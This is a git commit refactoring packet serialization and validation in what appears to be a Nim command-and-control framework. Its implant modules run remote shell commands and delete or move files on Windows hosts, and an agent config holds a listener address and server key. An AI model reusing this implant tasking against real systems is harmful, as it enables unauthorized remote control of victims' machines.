Cleaned up parts of the serialization by removing redundant code.

This commit is contained in:
Jakob Friedl
2025-07-28 21:29:47 +02:00
parent 882579b3cb
commit 0d54b3e64b
16 changed files with 185 additions and 199 deletions

View File

@@ -38,6 +38,6 @@ proc serializeHeartbeat*(config: AgentConfig, request: var Heartbeat): seq[byte]
request.header.gmac = gmac
# Serialize header
let header = packer.packHeader(request.header, uint32(encData.len))
let header = packer.serializeHeader(request.header, uint32(encData.len))
return header & encData

View File

@@ -248,7 +248,7 @@ proc serializeRegistrationData*(config: AgentConfig, data: var AgentRegistration
data.header.gmac = gmac
# Serialize header
let header = packer.packHeader(data.header, uint32(encData.len))
let header = packer.serializeHeader(data.header, uint32(encData.len))
packer.reset()
# Serialize the agent's public key to add it to the header

View File

@@ -13,26 +13,14 @@ proc deserializeTask*(config: AgentConfig, bytes: seq[byte]): Task =
var unpacker = initUnpacker(bytes.toString)
let header = unpacker.unpackHeader()
let header = unpacker.deserializeHeader()
# Packet Validation
if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.")
if header.packetType != cast[uint8](MSG_TASK):
raise newException(CatchableError, "Invalid packet type.")
# Validate sequence number
if not validateSequence(header.agentId, header.seqNr, header.packetType):
raise newException(CatchableError, "Invalid sequence number.")
validatePacket(header, cast[uint8](MSG_TASK))
# Decrypt payload
let payload = unpacker.getBytes(int(header.size))
let (decData, gmac) = decrypt(config.sessionKey, header.iv, payload, header.seqNr)
if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag (GMAC) for task.")
let decData= validateDecryption(config.sessionKey, header.iv, payload, header.seqNr, header)
# Deserialize decrypted data
unpacker = initUnpacker(decData.toString)

View File

@@ -51,6 +51,6 @@ proc serializeTaskResult*(config: AgentConfig, taskResult: var TaskResult): seq[
taskResult.header.gmac = gmac
# Serialize header
let header = packer.packHeader(taskResult.header, uint32(encData.len))
let header = packer.serializeHeader(taskResult.header, uint32(encData.len))
return header & encData

View File

@@ -1,9 +1,9 @@
# Agent configuration
-d:ListenerUuid="1842337B"
-d:Octet1="172"
-d:Octet2="29"
-d:Octet3="177"
-d:Octet4="43"
-d:ListenerPort=8080
-d:ListenerUuid="D3AC0FF3"
-d:Octet1="127"
-d:Octet2="0"
-d:Octet3="0"
-d:Octet4="1"
-d:ListenerPort=9999
-d:SleepDelay=3
-d:ServerPublicKey="mi9o0kPu1ZSbuYfnG5FmDUMAvEXEvp11OW9CQLCyL1U="

View File

@@ -44,6 +44,15 @@ proc decrypt*(key: Key, iv: Iv, encData: seq[byte], sequenceNumber: uint64): (se
return (data, tag)
proc validateDecryption*(key: Key, iv: Iv, encData: seq[byte], sequenceNumber: uint64, header: Header): seq[byte] =
let (decData, gmac) = decrypt(key, iv, encData, sequenceNumber)
if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag.")
return decData
#[
Key exchange using X25519 and Blake2b
Elliptic curve cryptography ensures that the actual session key is never sent over the network
@@ -148,4 +157,3 @@ proc loadKeyPair*(keyFile: string): KeyPair =
let keyPair = generateKeyPair()
writeKeyToDisk(keyFile, keyPair.privateKey)
return keyPair

View File

@@ -7,7 +7,7 @@ proc nextSequence*(agentId: uint32): uint64 =
sequenceTable[agentId] = sequenceTable.getOrDefault(agentId, 0'u64) + 1
return sequenceTable[agentId]
proc validateSequence*(agentId: uint32, seqNr: uint64, packetType: uint8): bool =
proc validateSequence(agentId: uint32, seqNr: uint64, packetType: uint8): bool =
let lastSeqNr = sequenceTable.getOrDefault(agentId, 0'u64)
# Heartbeat messages are not used for sequence tracking
@@ -26,3 +26,17 @@ proc validateSequence*(agentId: uint32, seqNr: uint64, packetType: uint8): bool
# Update sequence number
sequenceTable[agentId] = seqNr
return true
proc validatePacket*(header: Header, expectedType: uint8) =
# Validate magic number
if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.")
# Validate packet type
if header.packetType != expectedType:
raise newException(CatchableError, "Invalid packet type.")
# Validate sequence number
if not validateSequence(header.agentId, header.seqNr, header.packetType):
raise newException(CatchableError, "Invalid sequence number.")

View File

@@ -1,5 +1,5 @@
import streams, strutils
import ./[types, utils]
import streams, strutils, tables
import ./[types, utils, crypto, sequence]
type
Packer* = ref object
stream: StringStream
@@ -17,9 +17,8 @@ proc addData*(packer: Packer, data: openArray[byte]): Packer {.discardable.} =
return packer
proc addArgument*(packer: Packer, arg: TaskArg): Packer {.discardable.} =
if arg.data.len <= 0:
# Optional argument was passed as "", ignore
if arg.data.len <= 0:
return
packer.add(arg.argType)
@@ -34,7 +33,6 @@ proc addArgument*(packer: Packer, arg: TaskArg): Packer {.discardable.} =
return packer
proc addVarLengthMetadata*(packer: Packer, metadata: seq[byte]): Packer {.discardable.} =
# Add length of metadata field
packer.add(cast[uint32](metadata.len))
@@ -160,7 +158,8 @@ proc getVarLengthMetadata*(unpacker: Unpacker): string =
# Read content
return unpacker.getBytes(int(length)).toString()
proc packHeader*(packer: Packer, header: Header, bodySize: uint32): seq[byte] =
# Serialization & Deserialization functions
proc serializeHeader*(packer: Packer, header: Header, bodySize: uint32): seq[byte] =
packer
.add(header.magic)
.add(header.version)
@@ -174,7 +173,7 @@ proc packHeader*(packer: Packer, header: Header, bodySize: uint32): seq[byte] =
return packer.pack()
proc unpackHeader*(unpacker: Unpacker): Header=
proc deserializeHeader*(unpacker: Unpacker): Header=
return Header(
magic: unpacker.getUint32(),
version: unpacker.getUint8(),
@@ -186,3 +185,4 @@ proc unpackHeader*(unpacker: Unpacker): Header=
iv: unpacker.getIv(),
gmac: unpacker.getAuthenticationTag()
)

View File

@@ -1,6 +1,90 @@
import ./manager
import ../common/[types, utils]
# Define function prototypes
proc executePwd(config: AgentConfig, task: Task): TaskResult
proc executeCd(config: AgentConfig, task: Task): TaskResult
proc executeDir(config: AgentConfig, task: Task): TaskResult
proc executeRm(config: AgentConfig, task: Task): TaskResult
proc executeRmdir(config: AgentConfig, task: Task): TaskResult
proc executeMove(config: AgentConfig, task: Task): TaskResult
proc executeCopy(config: AgentConfig, task: Task): TaskResult
# Command definitions
let commands* = @[
Command(
name: "pwd",
commandType: CMD_PWD,
description: "Retrieve current working directory.",
example: "pwd",
arguments: @[],
execute: executePwd
),
Command(
name: "cd",
commandType: CMD_CD,
description: "Change current working directory.",
example: "cd C:\\Windows\\Tasks",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path of the directory to change to.", argumentType: STRING, isRequired: true)
],
execute: executeCd
),
Command(
name: "ls",
commandType: CMD_LS,
description: "List files and directories.",
example: "ls C:\\Users\\Administrator\\Desktop",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path. Default: current working directory.", argumentType: STRING, isRequired: false)
],
execute: executeDir
),
Command(
name: "rm",
commandType: CMD_RM,
description: "Remove a file.",
example: "rm C:\\Windows\\Tasks\\payload.exe",
arguments: @[
Argument(name: "file", description: "Relative or absolute path to the file to delete.", argumentType: STRING, isRequired: true)
],
execute: executeRm
),
Command(
name: "rmdir",
commandType: CMD_RMDIR,
description: "Remove a directory.",
example: "rm C:\\Payloads",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path to the directory to delete.", argumentType: STRING, isRequired: true)
],
execute: executeRmdir
),
Command(
name: "move",
commandType: CMD_MOVE,
description: "Move a file or directory.",
example: "move source.exe C:\\Windows\\Tasks\\destination.exe",
arguments: @[
Argument(name: "source", description: "Source file path.", argumentType: STRING, isRequired: true),
Argument(name: "destination", description: "Destination file path.", argumentType: STRING, isRequired: true)
],
execute: executeMove
),
Command(
name: "copy",
commandType: CMD_COPY,
description: "Copy a file or directory.",
example: "copy source.exe C:\\Windows\\Tasks\\destination.exe",
arguments: @[
Argument(name: "source", description: "Source file path.", argumentType: STRING, isRequired: true),
Argument(name: "destination", description: "Destination file path.", argumentType: STRING, isRequired: true)
],
execute: executeCopy
)
]
# Implementation of the execution functions
when defined(server):
proc executePwd(config: AgentConfig, task: Task): TaskResult = nil
proc executeCd(config: AgentConfig, task: Task): TaskResult = nil
@@ -10,7 +94,6 @@ when defined(server):
proc executeMove(config: AgentConfig, task: Task): TaskResult = nil
proc executeCopy(config: AgentConfig, task: Task): TaskResult = nil
# Implementation of the execution functions
when defined(agent):
import os, strutils, strformat, times, algorithm, winim
@@ -280,78 +363,3 @@ when defined(agent):
except CatchableError as err:
return createTaskResult(task, STATUS_FAILED, RESULT_STRING, err.msg.toBytes())
# Command definitions
let commands* = @[
Command(
name: "pwd",
commandType: CMD_PWD,
description: "Retrieve current working directory.",
example: "pwd",
arguments: @[],
execute: executePwd
),
Command(
name: "cd",
commandType: CMD_CD,
description: "Change current working directory.",
example: "cd C:\\Windows\\Tasks",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path of the directory to change to.", argumentType: STRING, isRequired: true)
],
execute: executeCd
),
Command(
name: "ls",
commandType: CMD_LS,
description: "List files and directories.",
example: "ls C:\\Users\\Administrator\\Desktop",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path. Default: current working directory.", argumentType: STRING, isRequired: false)
],
execute: executeDir
),
Command(
name: "rm",
commandType: CMD_RM,
description: "Remove a file.",
example: "rm C:\\Windows\\Tasks\\payload.exe",
arguments: @[
Argument(name: "file", description: "Relative or absolute path to the file to delete.", argumentType: STRING, isRequired: true)
],
execute: executeRm
),
Command(
name: "rmdir",
commandType: CMD_RMDIR,
description: "Remove a directory.",
example: "rm C:\\Payloads",
arguments: @[
Argument(name: "directory", description: "Relative or absolute path to the directory to delete.", argumentType: STRING, isRequired: true)
],
execute: executeRmdir
),
Command(
name: "move",
commandType: CMD_MOVE,
description: "Move a file or directory.",
example: "move source.exe C:\\Windows\\Tasks\\destination.exe",
arguments: @[
Argument(name: "source", description: "Source file path.", argumentType: STRING, isRequired: true),
Argument(name: "destination", description: "Destination file path.", argumentType: STRING, isRequired: true)
],
execute: executeMove
),
Command(
name: "copy",
commandType: CMD_COPY,
description: "Copy a file or directory.",
example: "copy source.exe C:\\Windows\\Tasks\\destination.exe",
arguments: @[
Argument(name: "source", description: "Source file path.", argumentType: STRING, isRequired: true),
Argument(name: "destination", description: "Destination file path.", argumentType: STRING, isRequired: true)
],
execute: executeCopy
)
]

View File

@@ -1,10 +1,28 @@
import ./manager
import ../common/[types, utils]
# Define function prototype
proc executeShell(config: AgentConfig, task: Task): TaskResult
# Command definition (as seq[Command])
let commands*: seq[Command] = @[
Command(
name: "shell",
commandType: CMD_SHELL,
description: "Execute a shell command and retrieve the output.",
example: "shell whoami /all",
arguments: @[
Argument(name: "command", description: "Command to be executed.", argumentType: STRING, isRequired: true),
Argument(name: "arguments", description: "Arguments to be passed to the command.", argumentType: STRING, isRequired: false)
],
execute: executeShell
)
]
# Implement execution functions
when defined(server):
proc executeShell(config: AgentConfig, task: Task): TaskResult = nil
# Implement execution functions
when defined(agent):
import ../agent/core/taskresult
@@ -38,18 +56,3 @@ when defined(agent):
except CatchableError as err:
return createTaskResult(task, STATUS_FAILED, RESULT_STRING, err.msg.toBytes())
# Command definition (as seq[Command])
let commands*: seq[Command] = @[
Command(
name: "shell",
commandType: CMD_SHELL,
description: "Execute a shell command and retrieve the output.",
example: "shell whoami /all",
arguments: @[
Argument(name: "command", description: "Command to be executed.", argumentType: STRING, isRequired: true),
Argument(name: "arguments", description: "Arguments to be passed to the command.", argumentType: STRING, isRequired: false)
],
execute: executeShell
)
]

View File

@@ -1,10 +1,27 @@
import ./manager
import ../common/[types, utils]
# Define function prototype
proc executeSleep(config: AgentConfig, task: Task): TaskResult
# Command definition (as seq[Command])
let commands* = @[
Command(
name: "sleep",
commandType: CMD_SLEEP,
description: "Update sleep delay configuration.",
example: "sleep 5",
arguments: @[
Argument(name: "delay", description: "Delay in seconds.", argumentType: INT, isRequired: true)
],
execute: executeSleep
)
]
# Implement execution functions
when defined(server):
proc executeSleep(config: AgentConfig, task: Task): TaskResult = nil
# Implement execution functions
when defined(agent):
import os, strutils, strformat
@@ -26,18 +43,3 @@ when defined(agent):
except CatchableError as err:
return createTaskResult(task, STATUS_FAILED, RESULT_STRING, err.msg.toBytes())
# Command definition (as seq[Command])
let commands* = @[
Command(
name: "sleep",
commandType: CMD_SLEEP,
description: "Update sleep delay configuration.",
example: "sleep 5",
arguments: @[
Argument(name: "delay", description: "Delay in seconds.", argumentType: INT, isRequired: true)
],
execute: executeSleep
)
]

View File

@@ -2,7 +2,7 @@ import terminal, strformat, strutils, sequtils, tables, json, times, base64, sys
import ../[utils, globals]
import ../db/database
import ../task/packer
import ../message/packer
import ../../common/[types, utils]
#[
@@ -58,11 +58,9 @@ proc getTasks*(checkinData: seq[byte]): seq[seq[byte]] =
# Update the last check-in date for the accessed agent
cq.agents[agentId].latestCheckin = cast[int64](timestamp).fromUnix().local()
# if not cq.dbUpdateCheckin(agent.toUpperAscii, now().format("dd-MM-yyyy HH:mm:ss")):
# return nil
# Return tasks
for task in cq.agents[agentId].tasks.mitems: # Iterate over mutable items in order to modify GMAC
for task in cq.agents[agentId].tasks.mitems: # Iterate over agents as mutable items in order to modify GMAC tag
let taskData = cq.serializeTask(task)
result.add(taskData)

View File

@@ -1,7 +1,7 @@
import terminal, strformat, strutils, tables, times, system, osproc, streams, base64
import ./task
import ../utils
import ../task/dispatcher
import ../db/database
import ../../common/[types, utils]

View File

@@ -1,6 +1,7 @@
import times, strformat, terminal, tables, json, sequtils, strutils
import ./[parser]
import ../utils
import ../message/parser
import ../../modules/manager
import ../../common/[types, utils]
@@ -72,7 +73,7 @@ proc handleAgentCommand*(cq: Conquest, input: string) =
try:
let
command = getCommandByName(parsedArgs[0])
task = cq.parseTask(command, parsedArgs[1..^1])
task = cq.createTask(command, parsedArgs[1..^1])
# Add task to queue
cq.interactAgent.tasks.add(task)

View File

@@ -27,7 +27,7 @@ proc serializeTask*(cq: Conquest, task: var Task): seq[byte] =
task.header.gmac = gmac
# Serialize header
let header = packer.packHeader(task.header, uint32(payload.len))
let header = packer.serializeHeader(task.header, uint32(payload.len))
return header & encData
@@ -35,27 +35,14 @@ proc deserializeTaskResult*(cq: Conquest, resultData: seq[byte]): TaskResult =
var unpacker = initUnpacker(resultData.toString)
let header = unpacker.unpackHeader()
let header = unpacker.deserializeHeader()
# Packet Validation
if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.")
if header.packetType != cast[uint8](MSG_RESPONSE):
raise newException(CatchableError, "Invalid packet type for task result, expected MSG_RESPONSE.")
# Validate sequence number
if not validateSequence(header.agentId, header.seqNr, header.packetType):
raise newException(CatchableError, "Invalid sequence number.")
validatePacket(header, cast[uint8](MSG_RESPONSE))
# Decrypt payload
let payload = unpacker.getBytes(int(header.size))
let (decData, gmac) = decrypt(cq.agents[uuidToString(header.agentId)].sessionKey, header.iv, payload, header.seqNr)
# Verify that the authentication tags match, which ensures the integrity of the decrypted data and AAD
if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag (GMAC) for task result.")
let decData= validateDecryption(cq.agents[uuidToString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header)
# Deserialize decrypted data
unpacker = initUnpacker(decData.toString)
@@ -86,18 +73,10 @@ proc deserializeNewAgent*(cq: Conquest, data: seq[byte]): Agent =
var unpacker = initUnpacker(data.toString)
let header= unpacker.unpackHeader()
let header= unpacker.deserializeHeader()
# Packet Validation
if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.")
if header.packetType != cast[uint8](MSG_REGISTER):
raise newException(CatchableError, "Invalid packet type for agent registration, expected MSG_REGISTER.")
# Validate sequence number
if not validateSequence(header.agentId, header.seqNr, header.packetType):
raise newException(CatchableError, "Invalid sequence number.")
validatePacket(header, cast[uint8](MSG_REGISTER))
# Key exchange
let agentPublicKey = unpacker.getKey()
@@ -105,11 +84,7 @@ proc deserializeNewAgent*(cq: Conquest, data: seq[byte]): Agent =
# Decrypt payload
let payload = unpacker.getBytes(int(header.size))
let (decData, gmac) = decrypt(sessionKey, header.iv, payload, header.seqNr)
# Verify that the authentication tags match, which ensures the integrity of the decrypted data and AAD
if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag (GMAC) for agent registration.")
let decData= validateDecryption(sessionKey, header.iv, payload, header.seqNr, header)
# Deserialize decrypted data
unpacker = initUnpacker(decData.toString)
@@ -148,26 +123,14 @@ proc deserializeHeartbeat*(cq: Conquest, data: seq[byte]): Heartbeat =
var unpacker = initUnpacker(data.toString)
let header = unpacker.unpackHeader()
let header = unpacker.deserializeHeader()
# Packet Validation
if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.")
if header.packetType != cast[uint8](MSG_HEARTBEAT):
raise newException(CatchableError, "Invalid packet type for checkin request, expected MSG_HEARTBEAT.")
# Validate sequence number
if not validateSequence(header.agentId, header.seqNr, header.packetType):
raise newException(CatchableError, "Invalid sequence number.")
validatePacket(header, cast[uint8](MSG_HEARTBEAT))
# Decrypt payload
let payload = unpacker.getBytes(int(header.size))
let (decData, gmac) = decrypt(cq.agents[uuidToString(header.agentId)].sessionKey, header.iv, payload, header.seqNr)
# Verify that the authentication tags match, which ensures the integrity of the decrypted data and AAD
if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag (GMAC) for heartbeat.")
let decData= validateDecryption(cq.agents[uuidToString(header.agentId)].sessionKey, header.iv, payload, header.seqNr, header)
# Deserialize decrypted data
unpacker = initUnpacker(decData.toString)

View File

@@ -1,4 +1,5 @@
import strutils, strformat, times
import ../utils
import ../../common/[types, utils, sequence, crypto]
@@ -72,7 +73,7 @@ proc parseArgument*(argument: Argument, value: string): TaskArg =
return result
proc parseTask*(cq: Conquest, command: Command, arguments: seq[string]): Task =
proc createTask*(cq: Conquest, command: Command, arguments: seq[string]): Task =
# Construct the task payload prefix
var task: Task